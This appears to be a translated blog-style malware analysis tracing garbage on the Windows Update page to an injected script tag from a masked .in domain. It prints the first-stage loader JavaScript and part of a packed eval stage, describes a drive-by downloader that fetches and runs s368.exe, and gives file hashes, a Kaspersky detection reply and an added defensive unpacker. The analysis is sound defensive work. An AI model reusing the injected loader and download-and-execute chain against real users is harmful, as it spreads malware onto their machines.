Is the Windows Update website hacked, or is it the ARP virus? Virus.Win32.AutoRun.am

Endurer, original, version 1

When I turned on my computer this morning, I found that Windows Update was slow, so I opened http://www.windowsupdate.com/ manually, but the page showed nothing but garbage.

Selecting "Windows Update" from the Start menu opens http://windowsupdate.microsoft.com/; it displays the same garbage as http://www.windowsupdate.com.

Check the IP addresses:

D:/PE/test> Ping www.windowsupdate.com

Pinging windowsupdate.microsoft.nsatc.net [207.46.225.221] with 32 bytes of data:

Request timed out.
Request timed out.
Request timed out.

Ping statistics for 207.46.225.221:
Packets: Sent = 4, received = 0, lost = 4 (100% loss ),
Approximate round trip times in Milli-seconds:
Minimum = 0 ms, maximum = 0 ms, average = 0 ms

[Query results] Your query: [IP address] 207.46.225.221 => 207.46.225.221
· Main data on this site: Microsoft, Redmond, Washington, USA
· Auxiliary data on this site: no data has been submitted
· Reference Data 1: Microsoft USA
· Reference Data 2: USA
[Query] www.123cha.com

D:/PE/test> Ping windowsupdate.microsoft.com

Pinging windowsupdate.microsoft.nsatc.net [207.46.18.94] with 32 bytes of data:

Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 207.46.18.94:
Packets: Sent = 4, received = 0, lost = 4 (100% loss ),
Approximate round trip times in Milli-seconds:
Minimum = 0 ms, maximum = 0 ms, average = 0 ms

[Query results] Your query: [IP address] 207.46.18.94 => 207.46.18.94
· Main data on this site: Microsoft, Redmond, Washington, USA
· Auxiliary data on this site: no data has been submitted
· Reference Data 1: Microsoft USA
· Reference Data 2: USA

Both IP addresses are normal.

The web page source looks like this:
/---
<SCRIPT src=hxxp://C***K**1*.in/n**.js></SCRIPT>
(the rest of the response is unreadable binary garbage)
---/

D:/test> Ping C *** K ** 1 *. In

Pinging C *** K ** 1 *. In [209.11.243.35] with 32 bytes of data:

Reply from 209.11.243.35: bytes = 32 time = 479 Ms TTL = 116
Reply from 209.11.243.35: bytes = 32 time = 411 Ms TTL = 116
Reply from 209.11.243.35: bytes = 32 time = 375 Ms TTL = 116
Request timed out.

Ping statistics for 209.11.243.35:
Packets: Sent = 4, Received = 3, Lost = 1 (25% loss),
Approximate round trip times in Milli-seconds:
Minimum = 375 ms, maximum = 479 ms, average = 316 ms

Your query: [IP address] 209.11.243.35 => 209.11.243.35
· Main site data: USA
· Auxiliary data on this site: no data has been submitted
· Reference Data 1: USA
· Reference Data 2: USA

Source code of hxxp://C***K**1*.in/n**.js:
/---
// first writes a tag that loads the second-stage script
document.writeln("<SCRIPT src=\"hxxp://C***K**1*.in/s368/newjs***2.js\"><\/SCRIPT>");
document.writeln("<SCRIPT>");
document.writeln("function start(){");
document.writeln("var then = new Date()");
// expiry one day ahead: the cookie marks the visitor so the payload fires once per day
document.writeln("then.setTime(then.getTime() + 24*60*60*1000)");
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = \"cookie1=\"");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
document.writeln("if (beginPosition != -1){");
document.writeln("} else ");
document.writeln("{document.cookie = \"cookie1=popw.s; expires=\" + then.toGMTString()");
document.writeln("");
document.writeln("}");
document.writeln("}");
document.writeln("start();");
document.writeln("</SCRIPT>")
---/

hxxp://C***K**1*.in/s368/newjs***2.js uses eval() to execute packed (obfuscated) code:
/---
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1a("\\i\\g\\e\\h\\j\\2 ... (omitted) ... |x2a|eval'.split('|'),0,{}))
---/

The original code is obtained after three rounds of unpacking. It uses Microsoft.XMLHTTP and Scripting.FileSystemObject to download s368.exe and save it to %WINDIR%. The file name is produced by this user-defined function:

/---
function gnms(n)
{
  // random number in [0, n), rounded, wrapped in a temp-file-looking name
  var numberms = Math.random() * n;
  return '~Temp' + Math.round(numberms) + '.tmp';
}
---/

That is, it generates ~Temp*****.exe, where ***** is a number, and then runs it through the ShellExecute method of the Shell.Application object with the command %WINDIR%\system32\cmd.exe /C %WINDIR%\~Temp*****.exe.
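As an added example (not the malware's code and not the author's), here is a static, eval-free unpacker for the p,a,c,k,e,d packer used by the second-stage script above, followed by a scan of the unpacked text for the Microsoft.XMLHTTP, Scripting.FileSystemObject and Shell.Application objects the downloader is described as using. The packed sample is constructed for the demo; the tail-matching regex, the unescapeLiteral helper and all function names are my own assumptions.

```javascript
// Added example, not the malware's or the author's code. Reverses the
// "p,a,c,k,e,d" packer statically (no eval) and flags the COM objects named on the page.
// Mirrors e(c) in the packer: base-a digits, letters above 35 via charCode+29.
function encodeToken(c, a) {
  return (c < a ? '' : encodeToken(Math.floor(c / a), a)) +
    ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36));
}

// One layer: substitute each token with its dictionary word, exactly as the
// packer's p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]) loop does.
function unpack(p, a, c, k) {
  let out = p;
  while (c--) {
    if (k[c]) {
      out = out.replace(new RegExp('\\b' + encodeToken(c, a) + '\\b', 'g'), () => k[c]);
    }
  }
  return out;
}

// Undo the simple JS string escapes (\' and \\) found in the extracted literals.
function unescapeLiteral(s) {
  return s.replace(/\\(.)/g, '$1');
}

// Assumed packer tail: }('payload',radix,count,'words'.split('|'),0,{}))
const PACKER_TAIL = /\}\('((?:[^'\\]|\\.)*)',\s*(\d+),\s*(\d+),\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)/;

// Peel packer layers until none remains (the page's sample needed three).
function unpackAll(src, maxLayers = 5) {
  let code = src;
  for (let i = 0; i < maxLayers; i++) {
    const m = PACKER_TAIL.exec(code);
    if (!m) break;
    code = unpack(unescapeLiteral(m[1]), Number(m[2]), Number(m[3]),
                  unescapeLiteral(m[4]).split('|'));
  }
  return code;
}

// COM objects named on the page as the downloader's building blocks.
const PAGE_INDICATORS = ['Microsoft.XMLHTTP', 'Scripting.FileSystemObject', 'Shell.Application'];
function suspiciousObjects(code) {
  return PAGE_INDICATORS.filter((name) => code.includes(name));
}

// Constructed sample: a single packed layer hiding an XMLHTTP instantiation.
const PACKED = `eval(function(p,a,c,k,e,d){/* packer body */}('0 1=2 3("4.5");',36,6,'var|x|new|ActiveXObject|Microsoft|XMLHTTP'.split('|'),0,{}))`;
console.log(unpackAll(PACKED));                    // var x=new ActiveXObject("Microsoft.XMLHTTP");
console.log(suspiciousObjects(unpackAll(PACKED))); // [ 'Microsoft.XMLHTTP' ]
```

Running it on a captured newjs***2.js would surface the download-and-execute logic without ever executing the script; the regex only recognises the standard packer tail, so hand-modified packers need the literals extracted another way.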

File description: D:/test/s368.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 8:39:29
Modification time: 8:39:29
Access time:
Size: 23087 bytes, 22.559 KB
MD5: a0795ad6df991d65b38968ced427f09b
Exestealth 2.0-2.4-> webtoolmaster

Subject: Re: s368.exe [KLAB-2419187]
Sender: <newvirus@kaspersky.com>
Sent at: 13:58:48

s368.exe - Virus.Win32.AutoRun.am

New malicious software was found in this file. Its detection will be added in the next update. Thank you for your help.

Please quote all when answering.
--
Best regards, Boris Yampolsky

Virus analyst, Kaspersky Lab.

E-mail: newvirus@kaspersky.com

http://www.kaspersky.com/

http://www.kaspersky.com/virusscanner - free online virus scanner.

http://www.kaspersky.com/helpdesk.html - technical support.

I downloaded and checked the file again and found that its MD5 had changed:

File description: D:/test/s368.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 19:43:49
Modification time: 19:43:50
Access time:
Size: 23087 bytes, 22.559 KB
MD5: e277b83f3eedac59ec0077bb981e4082
